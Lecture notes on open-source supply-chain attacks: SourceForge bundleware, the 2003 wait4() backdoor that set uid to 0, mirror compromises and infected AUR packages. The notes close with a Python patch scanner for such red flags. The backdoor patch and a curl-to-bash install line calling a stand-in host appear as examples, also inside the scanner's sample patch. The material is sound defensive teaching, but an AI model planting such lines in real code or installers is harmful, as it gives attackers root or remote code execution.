Open Source Computing

Week 6

August 7

SourceForge (and Gimp)

SourceForge is a popular alternative to GitHub for open-source projects. GitHub makes money selling space for non-public projects (public projects are free). SourceForge sold banner advertisements, and in 2013 started a "bundleware" program in which a user who downloaded a program or source tree would optionally receive a second download. The second download was selected by default, though users could unselect it. SourceForge is often used to distribute binaries, so this bundleware issue was not easily avoided once the download started.

The problem was that the second downloaded package, a paid installation, often involved malware. At a minimum, spyware was common. Another common feature was advertisements that were allowed to contain a large DOWNLOAD button.

The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was still distributing Gimp binaries (as an "abandoned" project), and bundling them with malware. This did not go over well with the Gimp team.

How can an open-source project protect itself against malicious distribution? What happens when a project is completely abandoned? What happens when a project simply moves elsewhere?

In 2016 the bundleware program was ended, as new owners took control.

Generally speaking, the actual open-source repositories weren't usually tampered with, though the Gimp case might be an exception.

Tampered or Trojaned Repositories

In 2003, the main Linux repository was still on BitKeeper, but the kernel developers also maintained a separate mirror repository running CVS. One day a patch appeared in the CVS image, in the code for the wait4() system call:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
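Review bot: the second operand on the first `+` line, `(current->uid = 0)`, is an assignment rather than a comparison; it stores 0 into the caller's uid and then evaluates to false, so `retval = -EINVAL` on the second line is dead code while the calling process is left with uid 0. A genuine check would read `current->uid == 0`, and an EINVAL return for the `__WCLONE|__WALL` flag combination would itself need a justification in the commit message.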

That last '=' on the first line is an assignment, not a comparison: the expression stores 0 into current->uid and evaluates to false, so the -EINVAL branch never runs, but the calling process now has uid 0, which is root. Inside a syscall, writing to current->uid is perfectly legal, so nothing stops it.

This patch never made it back to the main BitKeeper repo, and it was pretty obvious from the beginning as it was the only file on the CVS mirror that didn't have a link back to BitKeeper, but nobody knows how it got there. See lwn.net/Articles/57135.

There was a break-in at kernel.org in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult. Donald Austin was arrested for the breach, in Florida, in 2016.

In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package was modified to contain malware.

In June 2018, hackers took over a Gentoo mirror account on GitHub and installed file-deleting malware. Gentoo suffered at least one earlier such attack, in 2010.

In July 2018, three packages on the Arch User Repository were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to install a one-line attack in the installation script:

   curl -s https://badware.ly/stuff.sh | bash &

The AUR is not the same as the Arch distribution itself, but distinctions like this are sometimes hard to make.
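Both incidents above (the wait4() hunk and the one-line install-script attack) are the kind of thing a reviewer can catch mechanically. As an added example, not part of the course notes, here is a small Python scanner that runs two such checks over the added lines of a patch: an assignment inside an if/while condition, and a download piped straight into a shell. The sample patch, file names and URL are constructed for the demonstration.

```python
import re

# Constructed sample patch: a hunk shaped like the wait4() change from the
# CVS mirror incident, plus an install hook shaped like the AUR attack.
SAMPLE_PATCH = """\
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -1,3 +1,5 @@
 	if (options & __WNOTHREAD)
+	if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+			retval = -EINVAL;
 	if (retval == -EINVAL)
--- a/acroread.install
+++ b/acroread.install
@@ -1,2 +1,3 @@
 post_install() {
+   curl -s https://example.invalid/stuff.sh | bash &
 }
"""

# A lone '=' that is not part of ==, !=, <= or >=.  Compound assignments
# such as += are deliberately still flagged: they also mutate state.
ASSIGN_IN_COND = re.compile(r"(?<![=!<>])=(?!=)")
# curl/wget output piped into sh, bash, zsh or ksh (optionally via sudo).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")

def _condition_of(line):
    """Return the text inside the parentheses of an if/while, or None."""
    m = re.search(r"\b(if|while)\s*\(", line)
    if not m:
        return None
    depth, start = 0, m.end() - 1
    for i in range(start, len(line)):
        if line[i] == "(":
            depth += 1
        elif line[i] == ")":
            depth -= 1
            if depth == 0:
                return line[start + 1:i]
    return line[start + 1:]          # unbalanced: take the rest of the line

def scan_patch(patch):
    """Return (patch_line_no, check_name, added_line) for each red flag."""
    findings = []
    for lineno, raw in enumerate(patch.splitlines(), 1):
        if not raw.startswith("+") or raw.startswith("+++"):
            continue                 # only newly added lines are of interest
        added = raw[1:]
        cond = _condition_of(added)
        if cond is not None and ASSIGN_IN_COND.search(cond):
            findings.append((lineno, "assignment-in-condition", added.strip()))
        if PIPE_TO_SHELL.search(added):
            findings.append((lineno, "pipe-to-shell", added.strip()))
    return findings

if __name__ == "__main__":
    for lineno, check, text in scan_patch(SAMPLE_PATCH):
        print(f"line {lineno}: {check}: {text}")
```

A compiler would flag the first case with a warning about assignment in a condition; the point of doing it on the patch is that the check runs before anything is built or merged.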

In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab.